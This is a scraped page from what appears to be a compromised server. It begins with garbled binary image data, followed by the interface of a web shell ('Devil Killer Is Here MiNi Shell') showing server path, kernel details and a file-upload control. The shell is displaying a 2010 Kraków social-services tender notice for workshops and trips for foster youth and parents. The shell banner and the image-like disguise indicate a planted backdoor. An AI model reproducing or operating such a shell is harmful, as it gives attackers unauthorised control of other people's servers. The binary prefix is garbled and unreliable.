JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100817/222785-N-2010.html

<p class="kh_header"><b>Kraków: organizacja i przeprowadzenie wyjazdowych oraz stacjonarnych warsztatów dal klientów MOPS</b><br>
<b>Numer ogłoszenia: 222785 - 2010; data zamieszczenia: 17.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja i przeprowadzenie wyjazdowych oraz stacjonarnych warsztatów dal klientów MOPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie wyjazdowych oraz stacjonarnych warsztatów dla MOPS

Część I zamówienia - usługa turystyczna w ramach projektu systemowego Pora na aktywność - wyjazdowe warsztaty psychoedukacyjne
1)	Termin realizacji: 
I wyjazd - 28-29 sierpień 2010
II wyjazd - 18-19 wrzesień 2010
2)	Usługa obejmuje kompleksową obsługę 2 wyjazdów w tym:
a)	usługa hotelowa:
-	1 nocleg w hotelu położonym w odległości max. 100 km od Krakowa.
-	możliwość różnorodnego spędzenia czasu wolnego, w tym posiada basen (1 godz. basenu dla uczestnika/ na pobyt w cenie)
-	w pobliżu hotelu musi znajdować się atrakcja turystyczna (np.muzeum, kopalnia, zamek itp.) w których organizowane są zajęcia poznawczo-integracyjne (zwiedzanie + zajęcia,  konkursy, gry grupowe itp.) 
-	zakwaterowanie w pokojach 1,2 i 3 osobowych. Co najmniej 1 z pokoi w których zakwaterowane zostaną osoby z otoczenia beneficjenta koordynatorzy/ opiekunowie wyjazdu musi dysponować aneksem dziennym (stół, fotele lub krzesła) w związku z potrzebą ewentualnych konsultacji i uzgodnień wewnątrzgrupowych.
-	opiekę formalną i merytoryczną- poprzez zagwarantowanie w czasie każdego pobytu osobom z otoczenia, tj.2 opiekunom i 1 koordynatorowi wyjazdu pełnego zakresu świadczeń (analogicznie jak dla beneficjenta).
-	zapewnienie wyżywienia - menu w załączniku nr 1 do siwz
b)	transport z Krakowa do hotelu i z powrotem. Planowany wyjazd ok.godz.9.00, powrót następnego dnia po obiedzie, ok.15.00
c)	ubezpieczenie uczestników ubezpieczeniem NNW /min.10 000zł/os 
d)	zorganizowanie wycieczki - oferta wycieczkowa i kulturalno-rozrywkowa w pobliżu max. 30 km od hotelu (przystosowana dla młodzieży) zgodnie z opisem w punkcie 2) lit.a) dot. hotelu. czas trwania wycieczki - do 3 h
e)	zapewnienie sali konferencyjnej:
-	dostępna pierwszego i drugiego dnia pobytu, na min.25 osób, łącznie 7 godzin warsztatowych/pobyt
-	układ sali umożliwiający przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia ruchowe itp.
-	przerwa kawowa w trakcie warsztatów
-	wyposażenie: 
rzutnik z ekranem i możliwością podłączenia do laptopa, tablica typu flipchart z markerami ( 4x czarny, 2 x niebieski, 2x zielony, 2x czerwony), tablica suchościeralna z gąbką i pisakami (kolory j.w.), 2 ryzy papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć w hotelu.
f)	zapewnienie materiałów szkoleniowych dla każdego uczestnika: 
-	komplet cienkopisów 4 w kolorach (czerwony, niebieski, zielony, czarny)
-	długopis metalowy w etui, czarny typu zenit, 
-	teczkę tekturową lakierowaną na rzepę, 
-	zeszyt 30 kartkowy w kratkę,
-	identyfikator.
3)	Ilość uczestników: 45 osób, w tym: 39 klientów MOPS i 6 osób z otoczenia beneficjenta związanych z beneficjentami POKL poprzez zaangażowanie w proces usamodzielnienia pełniących rolę koordynatora wyjazdu i opiekunów grup, podzielonych na dwie grupy:
a)	I wyjazd - 19 usamodzielnianych wychowanków pełnoletnich lub takich, którzy ukończyli 17 r.ż. 
b)	II wyjazd - 20 przygotowywanych do usamodzielnienia wychowanków, przeważnie niepełnoletnich
c)	w każdym z wyjazdów po 3 osoby z otoczenia beneficjenta /2 opiekunów i 1 koordynator/

Część II zamówienia - usługa turystyczna w ramach projektu Mowa-rozmowa-porozumienie. Jak żyć z nastolatkiem
1)	Termin realizacji: 11-12.09.2010
2)	Usługa hotelowa:
a)	usługa hotelowa:
-	1 nocleg w hotelu położonym w odległości max. 70 km od Krakowa.
-	możliwość różnorodnego spędzenia czasu wolnego, w tym posiada basen (1 godz. basenu dla uczestnika/ na pobyt w cenie)
-	w pobliżu hotelu musi znajdować się atrakcja turystyczna (np.muzeum, kopalnia, zamek itp.) w których organizowane są zajęcia poznawczo-integracyjne (zwiedzanie + zajęcia,  konkursy, gry grupowe itp.) 
-	zakwaterowanie w pokojach 1,2 i 3 osobowych. 
-	opiekę formalną i merytoryczną- poprzez zagwarantowanie w czasie każdego pobytu osobom z otoczenia, tj.1 opiekunowi i 1 koordynatorowi wyjazdu pełnego zakresu świadczeń (analogicznie jak dla beneficjenta).
-	zapewnienie wyżywienia - menu w załączniku nr 2 do siwz
b)	transport z Krakowa do hotelu i z powrotem. Planowany wyjazd ok.godz.9.00, powrót następnego dnia po obiedzie, ok.15.00
c)	ubezpieczenie uczestników ubezpieczeniem NNW /min.10 000zł/os
d)	zorganizowanie wycieczki - oferta wycieczkowa i kulturalno-rozrywkowa w pobliżu max. 30 km od hotelu (przystosowana dla młodzieży) zgodnie z opisem w punkcie 2) lit.a) dot. hotelu. czas trwania wycieczki - do 3 h
e)	zapewnienie 2 sal konferencyjnych:
-	dostępne pierwszego dnia pobytu, jedna na min.25 osób, druga na nie mniej niż 30 osób - 4 godziny warsztatów  równocześnie w dwóch salach
-	układ sali umożliwiający przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia ruchowe itp.
-	Przerwa kawowa w trakcie warsztatów
-	Wyposażenie: 
rzutnik z ekranem i możliwością podłączenia do laptopa, tablica typu flipchart z markerami ( 4x czarny, 2 x niebieski, 2x zielony, 2x czerwony), 1 ryza papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć w hotelu.
f)	zapewnienie 2 pomieszczeń przeznaczonych do indywidualnych spotkań konsultacyjnych trenerów z chętnymi rodzinami w drugim dniu wyjazdu. Wyposażone w krzesła lub fotele ze stolikami - 2 godziny równocześnie w obu pomieszczeniach
3)	Ilość uczestników: 53 osoby, w tym 49 beneficjentów /20 dzieci w wieku 12-17 lat i 29 rodziców zastępczych/ oraz 4 osoby zaangażowane w realizację projektu. 

Część III zamówienia - usługa turystyczno-szkoleniowa - jednodniowy wyjazd o charakterze integracyjno-edukacyjnym pukam do drzwi dorosłości. Wspieranie rozwoju wychowanków rodzinnej pieczy zastępczej
1)	Termin realizacji: wrzesień 2010
2)	Obsługa obejmuje zorganizowanie jednodniowego wyjazdu o charakterze integracyjno-edukacyjnym zgodnie z wytycznymi:
a)	przeprowadzenie warsztatów:
-	6 godzinne zajęcia w formie warsztatowej mentalnie przygotowujące do wejścia w dorosłość, podjęcia adekwatnych ról społecznych - według specjalnie przygotowanego scenariusza zakładającego wspólną wyprawę symbolizującą drogę człowieka do dorosłości, poruszającą uniwersalne kwestie w obliczu stawiania się w pełni dojrzałą jednostką. 
-	zainicjowana zostanie grupa edukacyjno - wspierającą dla wychowanków rodzin zastępczych (wprowadzenie, informacja o zasadach funkcjonowania grup wsparcia) 
-	dostarczenie konspektu planowanych zajęć 
-	zapewnienie materiałów potrzebnych do przeprowadzenia warsztatów
b)	wydanie imiennych zaświadczeń o udziale w zajęciach dla uczestników 
c)	miejsce realizacji w odległości max.50 km od Krakowa
d)	zapewnienie posiłku w formie ogniska. Menu na 1 osobę:
-	kiełbasa (podwawelska lub śląska) - 20 dag
-	pieczywo pszenno-żytnie - 15 gkg
-	ketchup/musztarda - 5 dkg
-	dwa soki owocowe w kartoniku - 200 ml
-	woda mineralna - 150 ml
e)	opieka formalna i merytoryczna- poprzez zagwarantowanie w czasie każdego pobytu osobom z otoczenia, tj.1 opiekunowi i 1 koordynatorowi wyjazdu pełnego zakresu świadczeń (analogicznie jak dla beneficjenta).
f)	transport uczestników z Krakowa i z powrotem
g)	ubezpieczenie uczestników od nieszczęśliwych wypadków - NNW /min.10 000zł/os
3)	Zajęcia będą prowadzone przez dwóch trenerów jednocześnie. Po rozstrzygnięciu przetargu wybrani trenerzy będą zobowiązani zsynchronizować plany zajęć 
4)	Ilość uczestników: 17 w tym: 15 wychowanków rodzin zastępczych w wieku 15-18 lat i 2 osoby ze strony zamawiającego (koordynator i opiekun grupy)

	Część IV zamówienia - usługa szkoleniowa - przeprowadzenie wyjazdowych warsztatów psychoedukacyjnych   i poprowadzenie grupy wsparcia dla rodziców zastępczych w ramach projektu Mowa - rozmowa - porozumienie. Jak żyć z nastolatkiem
1)	Usługa obejmuje:
a)	przeprowadzenie wyjazdowych warsztatów psychoedukacyjnych zgodnie z wytycznymi:
-	warsztaty dla rodziców zastępczych z zakresu komunikacji interpersonalnej oraz umiejętności efektywnego rozwiązywania konfliktów i problemów wychowawczych sprawianych przez adolescentów / 4 godz. dydaktyczne/
-	 konsultacje dla rodzin /2 godz. zegarowe/
-	miejsce realizacji: w odległości max.70 km od Krakowa  w hotelu wskazanym przez zamawiającego, o którym mowa w II części zamówienia.
-	termin realizacji: warsztaty - 11.09.2010, konsultacje - 12.09.2010
-	zamawiający zapewnia zakwaterowanie w hotelu, wyżywienie i transport w czasie wyjazdów warsztatowych
b)	przeprowadzenie cyklu warsztatów psychoedukacyjnych z elementami grupy wsparcia 
-	4 spotkania po 2 godziny dydaktyczne
-	zajęcia będą kontynuacją wyjazdowych warsztatów psychoedukacyjnych i będą zawierać elementy grupy wsparcia dla opiekunów zastępczych borykających się ze specyficznymi problemami wynikającymi z wychowywania dzieci w okresie dojrzewania
-	miejsce realizacji: sala konferencyjna MOPS w Krakowie, ul. Józefińska 14
-	czas realizacji: od września do grudnia 2010 - raz w miesiącu , w terminie wskazanym przez Zamawiającego
c)	przygotowanie konspektów zajęć
2)	Ilość uczestników: 29 - rodzice zastępczy
	
	Część V zamówienia - usługa szkoleniowa - przeprowadzenie wyjazdowych warsztatów psychoedukacyjnych w ramach projektu Mowa - rozmowa - porozumienie. Jak żyć z nastolatkiem
1)	Usługa obejmuje:
a)	przeprowadzenie wyjazdowych warsztatów psychoedukacyjnych zgodnie z wytycznymi:
-	warsztaty dla dzieci w wieku 12-17 lat z zakresu komunikacji interpersonalnej oraz budowania poczucia własnej wartości i prawidłowej samooceny / 4 godz. dydaktyczne/
-	 konsultacje dla rodzin /2 godz. zegarowe/
-	miejsce realizacji: w odległości max.70 km od Krakowa  w hotelu wskazanym przez Zamawiającego, o którym mowa w II części zamówienia .
-	termin realizacji: warsztaty - 11.09.2010, konsultacje - 12.09.2010
-	zamawiający zapewnia zakwaterowanie w hotelu, wyżywienie i transport w czasie wyjazdów warsztatowych
b)	przygotowanie konspektów zajęć
2)	Ilość uczestników: 20

	Część VI zamówienia - usługa szkoleniowa - przeprowadzenie cyklu spotkań warsztatowych grupy psychoedukacyjnej dla młodzieży uczestniczącej w projekcie Pukam do drzwi dorosłości. Wspieranie rozwoju wychowanków rodzinnej pieczy zastępczej
1)	Usługa obejmuje:
a)	przygotowanie konspektów zajęć
b)	przeprowadzenie cyklu 4 spotkań warsztatowych grupy edukacyjno-wspierającej dla wychowanków rodzin zastępczych w wieku 15-18 lat
2)	Tematyka zajęć:
a)	naprawdę jaki/jaka jestem
b)	chcę realizować swoje marzenia
c)	mieć czy być - wartości moją siłą
d)	radzenie sobie z sytuacjami trudnymi, stresowymi. Trening relaksacyjny
3)	Zajęcia będą prowadzone łącznie z zajęciami, o których mowa w VII części zamówienia. Wykonawca jest zobowiązany zsynchronizować plany zajęć z Wykonawcą VII części.
4)	Ilość godzin dydaktycznych: 8 /4 spotkania po 2 godziny dydaktyczne/
5)	Ilość uczestników: 15
6)	Termin realizacji: wrzesień - grudzień 2010 - raz w miesiącu, w terminie wskazanym przez Zamawiającego.
7)	Miejsce realizacji: sala konferencyjna MOPS, ul. Józefińska 14
	
	Część VII zamówienia - usługa szkoleniowa - przeprowadzenie cyklu spotkań warsztatowych grupy psychoedukacyjnej dla młodzieży uczestniczącej w projekcie Pukam do drzwi dorosłości. Wspieranie rozwoju wychowanków rodzinnej pieczy zastępczej
1)	Usługa obejmuje:
a)	przygotowanie konspektów zajęć
b)	przeprowadzenie cyklu 4 spotkań warsztatowych grupy edukacyjno-wspierającej dla wychowanków rodzin zastępczych w wieku 15-18 lat
2)	Tematyka zajęć:
a)	naprawdę jaki/jaka jestem
b)	chcę realizować swoje marzenia
c)	mieć czy być - wartości moją siłą
d)	radzenie sobie z sytuacjami trudnymi, stresowymi. Trening relaksacyjny
3)	Zajęcia będą prowadzone łącznie z zajęciami, o których mowa w VI części zamówienia. Wykonawca jest zobowiązany zsynchronizować plany zajęć z Wykonawcą VI części.
4)	Ilość godzin dydaktycznych: 8 /4 spotkania po 2 godziny/
5)	Ilość uczestników: 15
6)	termin realizacji: wrzesień - grudzień 2010 - raz w miesiącu, w terminie wskazanym przez Zamawiającego
7)	Miejsce realizacji: sala konferencyjna MOPS, ul. Józefińska 14.
	
2.	Warunki płatności: przelewem w terminie do 14 dni od daty przyjęcia faktury/rachunku przez Zamawiającego.
3.	Warunki dodatkowe: 
1)	W przypadku gdy któryś z beneficjentów zrezygnuje z uczestnictwa w warsztatach Zamawiający zapłaci Wykonawcy wyłącznie wynagrodzenie należne z tytułu wykonania części zamówienia tj. faktycznej ilości uczestników warsztatów/wyjazdu.
2)	VI i VII część zamówienia nie może być realizowana przez tę samą osobę.
3)	Zamawiający a także podmiot kontrolujący zamawiającego może w każdej chwili skontrolować Wykonawcę w zakresie świadczonej przez niego usługi
4)	Wykonawca informuje uczestników wyjazdu  o współfinansowaniu usługi przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, oraz we współpracy z Zamawiającym oznakuje odpowiednio (logotypy POKL, UE- EFS i informacja o dofinansowaniu) pomieszczenia, w których będą się odbywały zajęcia stanowiące przedmiot niniejszej umowy /dot. części I/
5)	Wykonawca zapewni właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz przepisów ustawy o Państwowej Inspekcji Sanitarnej /dot. części I - III/
6)	Wykonawca zobowiązany jest dostarczyć polisę ubezpieczeniową potwierdzającą warunek ubezpieczenia uczestników najpóźniej  na 1 dzień przed rozpoczęciem wyjazdu /dot. części I -III/.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-4, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku I, II i III, części zamówienia posiadają wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	w przypadku III części zamówienia 
-	posiadają doświadczenie w realizacji podobnych warsztatów /min. 60 godzin przeprowadzonych warsztatów w ostatnich 3 latach
-	osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wykształcenie wyższe psychologiczne
b)	w przypadku IV, V części zamówienia 
-	osoby, które będą uczestniczyć w wykonywaniu zamówienia: posiadają wykształcenie wyższe na kierunkach: psychologia, pedagogika, socjologia, nauki o rodzinie, 
-	posiadają doświadczenie w prowadzeniu warsztatów psychoedukacyjnych - min.60 godzin przeprowadzonych warsztatów w ostatnich 3 latach
c)	w przypadku części VI części 
-	osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wykształcenie wyższe  na kierunkach psychologia, socjologia
-	posiadają doświadczenie w prowadzeniu warsztatów psychoedukacyjnych  - min 20 godzin w ciągu ostatnich 3 lat
-	posiadają doświadczenie w pracy z młodzieżą
- 	są zaangażowane w pracę z rodzinami zastępczymi i ich wychowankami na terenie gminy miejskiej Kraków,
-  	osoby, które będą uczestniczyć w wykonywaniu zamówienia: posiadają min. 4 letnie doświadczenie w pracy w jednostkach pomocy społecznej - w tym min. roczne doświadczenie w pracy z osobami usamodzielnianymi
d)	w przypadku VII części:
-	osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wykształcenie wyższe  na kierunkach psychologia, pedagogika, socjologia
-	posiadają doświadczenie w prowadzeniu warsztatów psychoedukacyjnych - min 20 godzin w ciągu ostatnich 3 lat
-	posiadają doświadczenie w pracy z młodzieżą</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do Rejestru Organizatorów Turystyki i Pośredników Turystycznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Kraków ul.Jóżefińska 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2010 godzina 08:00, miejsce: Dziennik Podawczy MOPS w Krakowie ul.Jóżefińska 14.</p>
